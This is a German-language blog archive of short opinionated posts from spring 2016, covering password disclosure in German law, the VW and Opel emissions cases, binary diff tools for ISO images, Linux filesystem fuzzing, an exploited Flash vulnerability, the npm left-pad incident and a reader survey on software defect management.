[l] Update zu hier: Das türkische Parlament hat es gemacht und die EU murmelt jetzt in ihren Bart.

Thu May 19 2016

[l] Ich rege mich hier häufiger darüber auf, wie die Justiz in Großbritannien oder den USA glaubt, Bürger zur Herausgabe eines Passworts zwingen zu können, wenn sie damit ihre Festplatte verschlüsselt haben. Dabei ist das doch ein völlig klarer Fall von dem absoluten Grundprinzip jeder Justiz, die den Namen Wert ist: Niemand kann gezwungen werden, sich selbst zu belasten.
Zeit für einen Blick darauf, wie das eigentlich in Deutschland gehandhabt wird.
Das kann man nämlich gerade schön beobachten, weil die Polizei die Wohnungen von Fotojournalisten durchsucht hat, die bei Blockupy 2015 Fotos gemacht haben.
Man muss gar nicht erwähnen, dass schon das ein krasser Verstoß gegen eine absolute Basis des Rechtsstaates ist, nämlich das Presseprivileg.
Aber wartet, geht ja noch weiter:
Offenbar versuchten die Beamten Cheung zum herausgeben des Passworts zu »überreden«, in dem sie ihm drohten, dass es mindestens sechs bis zwölf Monate dauern könnte, ehe er seine Sachen wiedersehe. »Weil die Techniker sehr beschäftigt sind«, soll einer der Beamten gesagt haben.
Mit anderen Worten: Schönen Computer haben Sie da! Dieses für Ihre Arbeit absolut essentielle Arbeitsmittel sehen Sie nicht wieder, außer Sie rücken jetzt Ihr Passwort raus!
Wartet, wird noch toller:
Die Frankfurter Staatsanwaltschaft bestätigte auf nd-Anfrage, dass auch die Wohnung eines zweiten Fotojournalisten in Berlin durchsucht wurde. Bei den Betroffenen handele es sich aber um unschuldige Personen, betonte Pressesprecherin Nadja Niesen.
JA WIESO MACHT IHR DANN WOHNUNGSDURCHSUCHUNGEN BEI DENEN?!? Was ist das denn hier für ein Unrechtsregime, wo die Polizei bei Unschuldigen die Wohnung durchwühlt und die Computer stiehlt?!?

Mon May 16 2016

[l] Norwegen, deren Staatsfonds der viertgrößte Anteilseigner ist, verklagt jetzt VW. Im Zuge des Abgasskandals hat der Staatsfonds Hunderte Millionen Dollar Verlust nur über den VW-Anteil gemacht.

Thu May 12 2016

[l] Old and busted: VW bescheißt beim Abgastest.
New hotness: Opel hat beim Abgastest "Irregularitäten"! ARD Monitor haben mit der Deutschen Umwelthilfe mal den Opel Zafira vermessen. Ergebnis:
Erste Tests im Labor bestätigten den Verdacht: Die Abgasreinigung des Zafira filterte nur unter bestimmten Bedingungen so viel giftiges Stickoxid heraus wie gesetzlich vorgesehen.
Oh, ach? Opel hat ein schön überspezifisches Dementi rausgehauen:
"Opel verwendet keine Software, die erkennt, ob ein Auto einem Abgastest unterzogen wird", teilte man damals mit.
Ja, nee, die Software erkennt nur zufällig etwas, das in hoher Korrelation dazu steht, ob gerade ein Abgastest läuft oder nicht!1!!
Das schöne ist ja, dass Opel Teil von General Motors ist. Jetzt kann Deutschland also theoretisch einmal direkt das mit General Motors machen, was die USA mit VW gemacht haben. Ich bin mir ziemlich sicher, dass die Merkel das für irgendwelche Zugeständnisse nutzen wird, vielleicht bei TTIP.

Mon May 9 2016

[l] Das Interview des Tages: Tagesschau-Reporter befragt den Bürgermeister von Rio wegen Olympia und Bauprojektproblemen.
Money Quote:
tagesschau.de: Die Bilder des eingestürzten Olympia-Radwegs mit zwei Toten gingen um die Welt. Welche Verantwortung tragen Sie für das Unglück?
Paes: Für die Einsturz des Radweges fühle ich mich schon verantwortlich und bedauere das sehr. Aber ich bin auch kein Ingenieur und habe die Planungen nicht gemacht. Brasilien hat sicher seine Probleme, nur die haben andere Länder auch. Was ist mit dem Flughafenbau in Berlin? Wer ist dafür verantwortlich?
Oooooooh wie schön! *Strike*
Ja, äh, wer ist denn dafür eigentlich verantwortlich? Wieso rollen da eigentlich keine Köpfe? (Danke, Thomas)

Sun May 8 2016

[l] Ich habe ja diese ganze Aufschrei-Geschichte damals großflächig ignoriert, weil das für mich die ganze Zeit so klang, als wolle sich da eine arbeitslose Medienberaterin auf Kosten anderer eine schöne Karriere als Twitter-Expertin für Empörungsblasen klarmachen.
Man erkennt sowas immer ganz gut daran, dass die Leute ihren Namen sagen. Wenn es um den Inhalt geht, braucht es keine Namensnennung. Auf Demo-Transparente schreibt man auch nicht den Namen drauf. Aber wenn jemand dann doch seinen Namen drantut, dann geht das im Allgemeinen nicht um die Sache, sondern darum, seine Person über Assoziation mit "da tut jemand was für die gute Sache" aufzuwerten.
Das ist wie wenn Politiker bei Demos mitlaufen. Die Politiker, die an der Misere die Schuld tragen, gegen die demonstriert wird.
Aber jetzt sah ich diese Buchrezension über das Buch, das die "Initiatorin" zur Karriereförderung schnell nachgeschoben hat damals. Und da steht am Ende dieses Zitat:
Statements wie: "Wir wollen radikale Veränderungen. Das muss Leute anpissen.” und “Solche Attacken sollen die Betreffenden zum Schweigen bringen. Ziel ist, sie mit so viel Hass zu überschütten, dass sie es am Ende bereuen, sich öffentlich geäußert zu haben." sind bezeichnend fuer den von Wizorek angefuehrten digitalen Mob. Geht man nicht mit der Meinung der Twitter-Feministinnen konform, wird geblockt, gedroht und diskreditiert.
Ich habe keine Ahnung, wer dieser Pallenberg ist, aber der ist anscheinend schon länger Opfer des Twittermobs, das dieses zitierte Statement losgetreten hat. Das volle Programm, Todesdrohungen, nächtliche Anrufe zuhause, etc pp.
Aus meiner Sicht haben wir damit ein Opfertum-Unentschieden und können das auf beiden Seiten als Argument und Emotionsauslöser wegkürzen.
Jedenfalls, wie ich drauf gekommen bin: über diesen Rant von Pallenberg über die Synchron-Twitter-Wichs-Dauerwerbesendung in Berlin und noch mehr darüber. Ich sag mal so: you had me at "bezahltes Panel" und "Eyeo". Au weia.
Das wäre mir ja peinlich, auf so einer "Konferenz" gesehen zu werden.
Und, so leid es mir tut: Damit hat sich Flattr keinen Gefallen getan, so gerne ich die mag und so lange wir schön bei Alternativlos mit denen zusammengearbeitet haben. Gut, dass Frank schon Patreon klargemacht hat.
Peter Sunde muss halt auch irgendwie seine Miete zahlen, denke ich.
Den Geruch von "Erpressung von Google und den Verlagen als Geschäftsmodell" kriegt Flattr jetzt nicht mehr weg. Das muss man sich vorher angucken, mit wem man da zusammenarbeitet.
Wenn die Republica seit 2009 einen Ruf erarbeitet hätte, den sie verlieren könnten, dann wäre der jetzt natürlich auch weg. Aber die hatten ja 2009 schon einen "Partner-Track" mit bezahlten Panels. Von IBM damals. Die waren noch nie satisfaktionsfähig.
Sehr schade, denn Markus ist ja an sich kein schlechter Mensch. Wirkt jedenfalls auf mich nicht so :-)
Und angesichts dieser Filz-Recherchen muss ich mich ja fragen, ob der Don Alphonso nicht doch die ganze Zeit schon Recht hatte.
Update: Mir hat jemand ein Foto der Stelle aus dem Wizorek-Buch geschickt. Das Zitat steht da zwar drin, war aber keine Handlungsanweisung sondern eine Beschreibung dessen, dem Wizorek sich selbst ausgesetzt glaubt.

Mon May 2 2016

[l] Greenpeace sagt, sie wollen heute TTIP veröffentlichen.
Die Presse hat sie auch schon.
Aber irgendwie hab ich ja keinen Bock mehr auf die Presse an der Stelle. Schaut nur, was die aus den Panama-Papers gemacht haben. Ein paar dreckige Scoops extrahiert, einmal in Richtung Russland gepinkelt, und dann fallengelassen wie eine heiße Kartoffel.
Kein Vergleich zu den veröffentlichten Rohdaten und der Suchmaschine, die Wikileaks immer hochgezogen hat bei sowas.
Ich komme mir bei sowas in letzter Zeit vor, als würde mich da jemand an einem Nasenring durchs Dorf zu ziehen versuchen. Nein, liebe SZ, ich würde mir gerne selber Gedanken machen. Eure Gedanken könnt ihr behalten. Packt die Daten ins Internet und überlasst das Rumgerüchten und Raunen lieber stinkenden Internet-Foren. Die sind da eh besser als ihr.
Ein bisschen Einordnen könnt ihr auch gerne machen, aber nicht aus einer "wir sind die einzigen, die die Daten haben"-Position heraus.
Update: Ist nur ungefähr die Hälfte von TTIP, was Greenpeace da hat.

Sat Apr 30 2016

[l] Habt ihr schon mal von Alfredo Stroessner gehört? Das war ein deutschstämmiger Diktator, der sich 1954 in Paraguy an die Macht geputscht hat.
Gaby Weber hat dazu beim Deutschlandfunk ein Feature gemacht, 45 Minuten Audio. Lohnt!
Der Stroessner hat damals erstmal Menschenjagd auf Indianer gemacht, die der Rinderzucht im Wege waren. Und zwar haben die Rinderzüchter damals Regenwald abgeholzt, um auf dem Boden Rinder züchten zu können, und damit die Jagdgründe der dort lebenden Indianer dezimiert. Die haben daraufhin gelegentlich zu wenig Essen vorgefunden und dann halt ein Rind von der Weide gejagd. Daraufhin haben die Rinderzüchter Jagd auf die Indianer gemacht und in Reservationen gefahren, wo die an Unterernährung und Krankheiten wie Grippe gestorben sind.
Das Auswärtige Amt hat sich damals dazu geäußert, dass von einer Verfolgung von Indianern nicht die Rede sein könne.

Tue Apr 26 2016

[l] Patrick Stewart in einem tollen Sketch über die Europäische Menschenrechtskonvention gemacht. Nicht nur für Fans von Monty Python ein Fest!

Mon Apr 25 2016

[l] Unix-User unter euch kennen sicher diff und patch, und rsync.
Wer ein diff und patch für Binärdateien sucht, für den gibt es leider kein Standardtool. Es gibt da diverse Tools auf dem Markt, das bekannteste ist xdelta, aber es gibt auch bsdiff, BDelta, bdiff (lag mal auf Sourceforge herum, aber scheint verloren gegangen zu sein; ich hatte hier noch einen Tarball für Version 1.0.4 herumliegen), jptch/jdiff und sicher noch mehr, die ich nicht kenne.
Mein Anwendungsfall war, dass ich hier ein ISO-Image einer Linux-Distribution ändere, und gerne davon wegkommen wollte, immer das ganze ISO übertragen zu müssen. Und so ein ISO, das sind mal eben 4 GB oder so.
Bei solchen Datenmengen trennt sich die Spreu vom Weizen. Ich nehme im Wesentlichen das unveränderte ISO-Image und füge ein paar Dateien dazu. Meine Erwartungshaltung war: Der Patch sollte 1 MB nicht überschreiten.
xdelta rödert länglich herum und erzeugt einen mehrere hundert MB großen Patch (ich nehme das ISO und füge ein paar Dateien dazu, wir reden hier von sowas wie 100 KB zusätzlichen Dateien). Da brach ich ab.
bsdiff versucht, die ganze Datei (mit read statt mmap!) in den Speicher zu lutschen und failed dabei, weil read() von 4 GB unter Linux nur 2 GB liefert. Ich weiß nicht, welcher Vollpfosten das bei Linux entschieden hat. In meinen Augen ist das ein Bug. War wahrscheinlich ein gut gemeintes Security-Theater oder so. bsdiff ist also auch ausgefallen.
jojodiff rödelt anderthalb Minuten und erzeugt dann 1,3 MB. Geht doch!
bdelta braucht 10 Sekunden (!?) und erzeugt einen Patch von 1,6 MB. Der funktioniert dann leider nicht. Wie sich rausstellt, ist das Dateiformat von bdelta hirnrissig und failed nicht wie im README dokumentiert ab 4 GB sondern schon vorher. Für das Abspeichern der relativen Offsets zwischen Quellen für Patches nimmt der 32-bit signed Integer, und prüft natürlich auch nicht, ob der Wert, den er abspeichern will, auch passt. bdelta ist aber ansonsten ausgesprochen sympathisch, weil der Quellcode so winzig und unprätentiös ist, und das Format so trivial. Also habe ich mal einen Patch gemacht, damit er die Integer mit variabler Länge abspeichert (ich nehme dafür das Verfahren von den Google Protocol Buffers, das ist ganz schlau wie ich finde). Das ganze Ding platzt wahrscheinlich immer noch bei Dateien über 4 GB, aber für meinen konkreten Anwendungsfall tut es ganz gut.
Weil das Projekt soweit verlassen wirkt, tu ich den Patch mal auf meinen Webserver, falls das jemand braucht.
Update: Ein langjähriger Leser weist darauf hin, dass ich die Gründe für das 2 GB-Limit schon mal erklärt hatte. Mein Kumpel Erdgeist prüft das übrigens gerade unter BSD, und zumindest OS X hat auch ein 2 GB-Limit, sogar dokumentiert bei readv.
Update: Unter den freien BSDs hat read() auch ein 2GB-Limit. WTF!?
Update: Einige Leser haben herausgefunden, dass man unter FreeBSD das 2GB-Limit mit den sysctls debug.devfs_iosize_max_clamp und debug.iosize_max_clamp abschalten kann.

Mon Apr 18 2016

[l] Bald Gesetzeslage in UK:
many British scientists will soon be blocked from speaking out on key issues affecting the UK – from climate change to embryo research and from animal experiments to flood defences.
Die genaue Regelung ist:
researchers who receive government grants will be banned, as of 1 May, from using the results of their work to lobby for changes in laws or regulations.
Ja nee, natürlich, leuchtet ja auch ein. Mal will ja nicht, dass Gesetze nach Faktenlage gemacht werden. Das ist dem Lobbyismus und der Korruption nur im Weg.
Höchste Zeit für Brexit und Schottland sollte das mit der Abspaltung auch nochmal in Angriff nehmen.

Sat Apr 16 2016

[l] Das US-Parlament hat mit einem Gesetz die Netzneutralitätsbemühungen ihrer Regulierungsbehörde FCC weitgehend kaputtgemacht.

Fri Apr 15 2016

[l] Edward Snowden und Jean-Michel Jarre haben jetzt zusammen Musik gemacht.

Wed Apr 13 2016

[l] In der Genforschung geht es ja häufig darum, Gene zu identifizieren, die ein erhöhtes Risiko für furchtbare Krankheiten mit sich bringen. Sowas wie "mit der Mutation kriegt man Knochenverformungen oder Mukoviszidose und stirbt im Kindesalter".
Jetzt haben wir genug Gentest-Datenbasis, dass Forscher mal "Big Data" über Gendaten gemacht haben, und nach Leuten gesucht haben, die nach landläufigem Verständnis der Risikogene tot sein sollten, aber es nicht sind. Und sie haben 13 Menschen gefunden.

Mon Apr 11 2016

[l] Ergebnisse von Filesystem-Fuzzing unter Linux. Das ist ein völlig unterbelichtetes Sicherheitsrisiko, das von vielen Leuten seit vielen Jahren ignoriert wird.
Und früher war das vielleicht mal ein Argument. Als man für den Einbau einer Festplatte noch SCSI-Kabel legen und eine Blutspende des Admins abgeben musste.
Selbst wenn bösartige USB-Sticks in aller Munde sind, endet die Debatte häufig bei Autoruns. Aber was wenn da jemand ein bösartiges Filesystem drauftut? Ich persönlich fand ja, dass das schon seit iSCSI und Fibre Channel und so nicht mehr wegzudiskutieren ist als Problemklasse.
Und so freut es mich sehr, dass es da jetzt einen konzertierten Anlauf gibt, die Filesysteme unter Linux mal robuster zu machen. Es geht ja nicht nur um Security. Man will ja auch nicht, dass der Kernel panict, nur weil auf einer alten Gammelplatte ein paar Bits geflippt sind.
Die Ergebnisse sind ungefähr, wie ich sie erwartet hätte. ext4 hat am längsten durchgehalten (deshalb setze ich das auch überall ein). Am schnellsten ist btrfs gestorben. XFS hielt erstaunlich lange durch, aber nicht so lange wie ext4. Naja und die ganzen Novelty-Filesysteme sterben natürlich alle recht schnell. Da sind die Autoren ja froh, wenn der Code durch-kompiliert.
Man muss dazu sagen, dass das nicht einfach nur ein Dumb Fuzzer war, sondern AFL, das ist ein adaptiver Fuzzer mit einer Art genetischem Programmieren. Der instrumentiert den Code und baut dann Testcases, um die Coverage zu maximieren, um jede Kombination aus Codepfaden mal genommen zu haben. Das Ding ist State of the Art. Wenn Code das überlebt, haben die Programmierer was richtig gemacht.

Sun Apr 10 2016

[l] Hattet ihr eigentlich gesehen, dass es mal wieder einen kritischen Patch für Flash gibt? Jaja, ich weiß, Flash, who cares, wissen wir doch alle, dass Flash Kacke ist.
Das ist nicht der Punkt. Der Punkt ist das hier:
Vor allem Windows-Nutzern rät Adobe zu einem zügigen Update. Denn die Lücke mit der Kennung CVE-2016-1019 werde derzeit aktiv ausgenutzt. Das geschehe in Windows bis inklusive Version 10 und dem Flash Player 20.0.0.306. Kaspersky zufolge machen sich zwei Exploit-Kits die Lücke zunutze, um die Erpressungs-Trojaner Cerber und Locky auszuliefern.
Jetzt vergesst mal bitte kurz den Flash-Teil.
Ihr solltet gerade alle den Arsch auf Grundeis haben.
Was wir hier gerade beobachten können, ist dass nicht mehr nur 0days einen Marktwert haben, sondern jede Sicherheitslücke.
0days sind rar und teuer. Gut, in diesem Fall war es auch ein 0day. Aber denkt euch das mal weg.
Das hier ist die Industrialisierung der Computer-Einbrüche.
Gut, einen Markt für gehackte Rechner gab es schon immer. Botnetz-Betreiber haben damit organisiertes DDoS gegen Online-Casinos und so gemacht.
Aber bei diesen Erpressungs-Trojanern vermute ich den möglichen Payout deutlich höher.
Und die Zeiten von "wieso würde mich denn jemand hacken wollen, ich habe doch keine wichtigen Daten" sind auch endgültig vorbei. Das redet sich hoffentlich niemand mehr ein.

Fri Apr 8 2016

[l] Zu der "Die Amis erschießen beim Obama-Besuch Menschen"-Geschichte kamen noch einige Kommentare rein. Tenor war im Wesentlichen, dass man das ja mit Gesetzen eh nicht verhindern könne, dass die da einen auf Wilder Westen machen, und seit wann scheren sich die Amis um anderer Länder Gesetze und "was willst du machen, ihnen ein Knöllchen schicken?". Die interessanteste Anekdote dazu will ich hier mal wiedergeben:
Vor ein paar Jahren war ein hochrangiges US-Regierungsmitglied in der Schweiz zu Besuch (ich meine es war Madeleine Albright oder John Kerry). Auf dem Weg vom Flughafen nach Bern ging der Limousine der Sprit aus und das begleitende US-Sicherheitspersonal hat dann einfach mal schnell (also innert weniger Minuten) eine gesamte Autobahnraststätte "leergeräumt", damit das Auto dort tanken konnte. Das geschah zwar in Absprache mit der Kantonspolizei, jedoch konnte das mehr oder weniger nur noch abgenickt werden.
Interessanter waren jedoch die Geschehnisse im Bundeshaus, dem Schweizer Pendant zum Reichstag. Dort gibt es die Regel, dass innerhalb des Gebäudes ausschliesslich die Mitglieder des Bundessicherheitsdienstes (BSD) Waffen tragen dürfen. Zu dieser Regel gibt es wohl nur die Ausnahme für unterstützende Schweizer Polizeikräfte und Geheimdienst, wenn beispielsweise Bundesratswahlen sind. Für private und ausländische Sicherheitskräfte gilt, dass diese am Eingang ihre Waffen abgeben müssen (gilt auch für Gäste selbst, es gab mal ein Skandälchen als Yassir Arafat seine Schusswaffe am Eingang nicht abgeben wollte).
Für den Secret Service gab es dann aber tatsächlich eine Ausnahme. Das Ergebnis war dann, dass, diplomatisch gesehen, der Secret Service sich wie die Axt im Wald im Bundeshaus verhalten hat. Sie haben (auch dem BSD) während des Besuches die Befehle gegeben, haben sich nicht drum gekümmert, was die Mitarbeiter des BSD angeordnet haben. Dies ging soweit, dass es sogar körperliche Übergriffe auf Mitarbeiter der Parlamentsdienste gab (Albright/Kerry wollte aufs Klo, das wurde angekündigt und ein Mitarbeiter der Parlamentsdienste, der dort abgestellt war, wurde kurzerhand von einem Secret Service Mitarbeiter gepackt und aus dem Toilettenbereich geworfen - ohne vorher wenigstens zu sagen, bitte raus hier.
Long story short, der Secret Service hatte im Bundeshaus das Sagen und missachtete, wenn er es für nötig erachtete, jegliche Regeln die normalerweise gelten und abgemacht waren.
So etwas gab es bisher nur bei jenem Besuch und gab für schweizer Verhältnisse starke Verstimmung (in inoffiziellem Rahmen natürlich), sowohl auf Seiten des Bundessicherheitsdienstes als auch der Parlamentsdienste.
Wie das nun im Falle eines Schusswaffeneinsatzes am Ende aussieht kann man durch oben genannte Ereignisse natürlich nicht konkret einschätzen, aber es gibt vielleicht eine Idee wie es ablaufen könnte.
Was ich mich auch noch frage, haben vielleicht die Mitarbeiter des Secret Service sogar diplomatischen Status?
Update: Besonders lustig ist ja, wie die Amerikaner reagieren, wenn Erdogans Leibwächter ähnliche Standards bei ihnen in Amerika ansetzen und ein paar Journalisten verprügeln :-)

Thu Apr 7 2016

[l] Der EU-Generalanwalt findet, dass Links auf Urheberrechtsverletzungen OK sind. Begründung:
Die Links sorgten zwar dafür, dass die umstrittenen Bilder deutlich leichter aufzufinden waren. Der Öffentlichkeit zugänglich gemacht wurden sie allerdings durch die Website, die sie ins Internet gestellt hat, nicht durch andere, die die Inhalte verlinkt haben.
Dem aufmerksamen Beobachter wird auffallen, dass diese Begründung 1:1 auch auf Bittorrent zutrifft.
Wathelet erklärte, eine andere Auslegung des EU-Rechts könne das Funktionieren des Internets erheblich beeinträchtigen und das erklärte Ziel, die Informationsgesellschaft in Europa zu fördern, gefährden
Na DA bin ich ja mal gespannt, ob sich das Gericht der Empfehlung des Generalanwalts anschließt!
Update: Die Musikindustrie wird von der Entwicklung eher überrascht:
freute sich Bäcker: "Langsam erziehen wir die Gerichte."

Wed Apr 6 2016

[l] Jens Berger ist unzufrieden mit den Panama Papers.
Weil hier so viele Kommentare in die Richtung eingehen, will ich es auch mal kurz ausformulieren: Wenn hier keine US-Amerikaner enthüllt werden, und die Enthüllten keine juristischen Konsequenzen zu fürchten haben, dann stellen sich gewisse Fragen. Die USA hatten ja kürzlich erst ihre Rahmenbedingungen für inländische Steueroasen für ausländisches Geld deutlich verbessert und dann angefangen, die Schweiz als Standort sturmreif zu schießen. Und jetzt muss halt mit Panama der nächste Konkurrent dran glauben.
Irgendwo muss das Geld der gebrannten Kinder ja hin. Da bieten sich die USA ja förmlich an!1!!
Wer war noch gleich der anonyme Datenspender? Vielleicht das Land mit dem umfassensten Daten-Abgreifsystem der Welt? Das Land mit der legendären Hacking-Abteilung, die auch Stuxnet gemacht haben? Und damit es nicht so offensichtlich ist, filtert man die eigenen Parteibonzen raus und übergibt den Scoop einer befreundeten ausländischen Zeitung?
Das schöne an solchen Theorien ist ja immer, dass sie nicht falsifizierbar sind. Wenn die SZ jetzt ein paar Amis hochgehen lässt, dann kann man das wunderschön wegargumentieren als geschulter Verschwörungstheoretiker :)
[l] Mir ist vorhin von einer anonymen Quelle verraten worden, wie das FBI das Telefon wirklich aufgemacht hat :-)

Fri Mar 25 2016

[l] Bei der Meldung, dass es in UK Meldepflicht für potentielle spätere Terroristen im Kindergarten gibt, hat sich vielleicht der eine oder andere gedacht: Da wird schon keiner mitmachen. Die Menschen, die das am Ende umsetzen wollen, werden sich für so einen Scheiß nicht instrumentalisieren lassen. So viel Menschlichkeit haben die Menschen in Großbritannien noch.
Nun, äh, wie soll ich sagen…: Großbritannien: Vierjähriger wegen Terrorverdacht gemeldet
Was hat er denn gemacht, der Vierjährige? Er hat sich beim Gurke-Schneiden gemalt.
Ich finde, diese Meldung passt perfekt zu De Maizieres Ansagen gerade, dass man in Krisenzeiten (also immer) Datenschutz mal runterfahren und den Polizeistaat hochfahren muss.
[l] Craig Venter ist mit seinem künstlichen Lebewesen gescheitert. Der Mann ist der Bulldozer unter den Genforschern, hat damals praktisch eigenhändig dem Human Genome Project Konkurrenz gemacht und hat dabei fast gewonnen. Der hat sich jetzt zum Ziel gesetzt, ein künstliches Bakterium zu schaffen.
Der Ansatz war, nur die Teile aus dem Genom zu nehmen, die wir verstehen, und ein Bakterium zu bauen, das nur Fressen und Fortpflanzen kann. Das war dann aber nicht lebensfähig am Ende.
Damit klar, dass die anderen Genstränge nicht bloß "Junk DNA" waren sondern eine vitale Rolle spielen.
Update: Venter ist einer der Leute, die bei jedem Scheitern noch mehr erreichen als andere Leute in einem ganzen Leben des "nicht scheiterns".

Thu Mar 24 2016

[l] Diese Node.js-Javascript-"Programmierer" haben es geschafft, dass Java im Vergleich rational und gesund aussieht. Da hat irgendein Fuzzy ein "Paket" depubliziert, und plötzlich bröselte das halbe Ökosystem weg.
Das "Paket" bestand aus einer 11-Zeilen-Funktion, die einen String rechtsbündig formatiert.
Nein, wirklich!
Und das war als Dependency bei der halben JS-Welt mit dabei, u.a. bei React und Babel.
Und das ist nur der Anfang der Geschichte. Es stellt sich raus, dass es da ein "Paket" gibt, das herausfindet, ob eine Variable ein Array ist. Ein Einzeiler. Dieses "Paket" hat fast eine Million Downloads pro Tag.
Ein anderes "Paket" sagt, ob eine Zahl positiv ist. Dieses "Paket" liegt in Version 3.1 vor. Nein, wirklich!
Kann man sich gar nicht ausdenken.
Ich meine, gut, der Rest der Programmierwelt hat ja schon immer auf die Javascript-Leute herab geblickt. Sogar die PHP-Leute. Und wenn die PHP-Leute auf dich herabblicken, und du dann immer noch nicht merkst, dass du im Leben Fehler gemacht hast, dann ist dir möglicherweise einfach wirklich nicht zu helfen.

Tue Mar 22 2016

[l] Ich glaube, ich habe noch zu keiner Umfrage so viele Einsendungen gekriegt wie zu der mit Defect Management. Ich bin noch nicht mal ansatzweise durch mit den ganzen Mails. Aber einige Sachen stechen heraus.
Erstens: Fast immer heißt es "keine Zeit". Auch in Abwandlung als "andere Sachen sind wichtiger". Wir reden hier also von einer BWL-Betrachtung der Situation. Da kommen dann so Argumente wie "der Kunde hat ja schon gezahlt". Wieso sollte ich mich um Bugs kümmern, nachdem der Kunde gezahlt hat? Wichtiger ist es, neue Kunden zu gewinnen.
Daraus folgt dann spannenderweise direkt ein Argument für Abo-Modelle, SaaS und Cloud Computing. In den Fällen, würde man ja denken, hat der Betreiber einen direkten Anreiz, seinen Scheiß stabil zu kriegen. Denn er schadet sich nur selber, wenn es nicht stabil ist.
Aber dem gegenüber stehen dann Einsendungen aus der Spielebranche. So F2P- und Browserspiele meine ich jetzt. Die haben ja nun "wir schaden uns nur selbst" als Extrem, sozusagen in Reinform. Dem Argument folgend müssten die ja alle Bugs immer sofort fixen. Tun sie aber nicht. Im Gegenteil, da bleibt auch alles liegen. Deren Metriken sind die Rate der neu angelegten Accounts und die reinkommende Kohle pro Tag. Das heißt, dass die Bugs ganz schnell schließen, mit denen man beispielsweise bescheißen kann, oder den Server abstürzen lassen kann. Die zweite Reihe sind Bugs, mit denen man andere Leute ärgern kann. Die werden auch gefixt, aber nur, wenn sie außen bekannt werden und weiträumig ausgenutzt werden.
Wir haben hier also keinesfalls die Situation, dass "der Markt das dann schon richten wird", wenn man das rein ökonomisch bewertet alles.
Andere strukturelle Probleme, die immer wieder angeführt werden, sind Ausschreibungen. Das Konzept der Ausschreibung führt dazu, dass der Billigste gewinnt, und der ist nur deshalb so billig, weil er kein Budget für Fehlerbereinigung zurücklegt. Mehrere Einsender schreiben sogar, dass Fehler absichtlich eingebaut wurden, damit man auch noch einen Support-Vertrag verkaufen kann, und über den dann die Differenz zwischen der Ausschreibung und den realen Kosten wieder reinholen kann.
Ein weiteres wiederkehrendes Element sind unnötige Grabenkämpfe. Die Tester fühlen sich von den Entwicklern vorgeführt und ignoriert. Die Entwickler fühlen sich von Testern und Management gegängelt. Das Management spart die Tester am liebsten ganz ein und macht den Entwicklern uninformierte Vorgaben. Gerne wird auch über Vertriebler geschimpft, die Dinge verkauft haben, die gar nicht einlösbar sind.
Ich glaube, dass man hier auf allen Seiten das Verhalten ändern muss. Das Management hat die Aufgabe, Geld zu sparen, und "Prozesse zu optimieren". Bis es schmerzt. Ob es schmerzt oder nicht, das brauchen sie als negatives Feedback. Und es muss für sie klar erkennbar sein, dass das jetzt zuviel "optimiert" war. Die Entwickler verhalten sich aber häufig dumm in der Situation und versuchen, die unmöglichen Vorgaben einzuhalten. Dabei wird der Code schlechter und schlechter, ein Legacy-Schuldenberg baut sich auf, und die Bugs kommen beim Management aber nicht als "das liegt an deiner Sparpolitik" an sondern als "die Entwickler sind inkompetent und undiszipliniert" an — und die machen dann weiter mit der "Kostenoptimierung".
Und was das Management falsch macht ist, dass sie keine Risiken eingehen. Man muss die Management-Hierarchie als Risiko-Puffer betrachten. Das Management unten und die Entwickler, die sollen Risiken eingehen. Die sollen keine unsauberen Abkürzungen nehmen. Aber wenn sich eine Gelegenheit bietet, mit einer anderen Technik besser zu sein, dann sollen sie das machen. Das untere Management hat genau die Aufgabe, das zu begleiten, und die Reißleine zu ziehen, wenn das schief läuft. Und das Management darüber ist dafür da, solche Fehlversuche dann zu kompensieren. In der Realität gibt das untere Management Kritik direkt an die Entwickler weiter, die sind dann verunsichert und machen lieber gar nichts, bevor sie was falsch machen, und das Ergebnis ist für alle Scheiße.
Entwickler müssen verstehen, dass sie gemanaged werden, nicht befehligt. Essentieller Teil von Management ist, dass man beobachten kann, wenn etwas falsch läuft, und dann gegensteuert. Entwickler, die schlechte Nachrichten nicht an das Management weiterleiten, und technische Schuld auftürmen, um dem Management zu gefallen, sabotieren damit das System und ruinieren die Firma.
Oh, eine strukturelle Sache habe ich noch: "Das ist doch nur ein Prototyp / end of life / wir rollen demnächst Version 2 aus, da muss man doch jetzt keine Arbeit mehr investieren". Und dann scheitert das Ausrollen der Nachfolgeversion und man hat sich selbst in den Fuß geschossen.
Auch "the guy left"-Szenarien scheinen erschütternd häufig vorzukommen. Und Teil von dem oben erwähnten Konkurrenzdenken ist auch, dass man dann Kosten externalisiert. "Ich muss das nicht fixen, wenn es einen Workaround gibt. Mit dem schlägt sich dann das Support-Team herum, nicht wir."
Die Heilsversprechen von Scrum und co haben sich in der Realität nur partiell manifestieren können. Bei einigen scheint das gut zu klappen, bei anderen führt es zu Burnout durch den hohen Druck und der totalen Transparenz, bei wieder anderen gibt es für Bugfixes keine Punkte im Sprint, daher macht es niemand, und bei noch anderen fallen Bugs unter den Tisch, weil man ihren Aufwand schlechter abschätzen kann als für Neuentwicklungen.
Update: Oh und: So 5% der Einsender widersprechen meiner Prämisse, dass das Management grundlegend versteht, dass Bugs nicht fixen die Sache schlimmer macht.
Update: Es waren dann doch auch mehr als nur einer dabei, die sagten, dass sie alle Bugs fixen, und zwar so schnell wie sie können.

Mon Mar 21 2016

[l] Liebe Projektmanager und Entwickler unter meinen Lesern, ich möchte mal eine kleine Umfrage machen.
Es geht um Defect Management. Eigentlich geht es mir nur um Software, aber ich vermute, dass das Prinzip auch überall sonst anwendbar ist, wo Dinge gebaut oder entworfen werden.
Hier ist die Prämisse: Fehler zu fixen ist teuer und aufwendig, und je länger man mit damit wartet, desto teurer und aufwendiger wird es.
Jetzt die Frage: Entwickler wissen das. Manager wissen das. Tester wissen das. ALLE WISSEN DAS. Wieso haben wir immer noch dauernd Situationen, in denen Bugs herumgammeln?
Die offensichtliche Erklärung ist, dass es irgendwelche Anreize in die Gegenrichtung gibt. Die würde ich gerne sammeln.
Ich gehe hier von so Dingen aus wie "ich traue mir nicht zu, den Bug zu fixen, weil ich ihn noch nicht verstanden habe" (offensichtlich eine schlechte Ausrede, denn dann debuggt man das halt, bist man es verstanden hat; wird ja nicht besser!) oder "Ich werde hier für Softwareentwicklung bezahlt, nicht für Fehlerkorrekturen", vielleicht auch in Form von "Die Deadlines sind zu kurz, ich habe da keine Zeit für" oder so.
Ich hätte da gerne mal eine nicht repräsentative Umfrage gemacht und würde gerne mal die Antworten aus verschiedenen Firmen und Branchen sammeln.
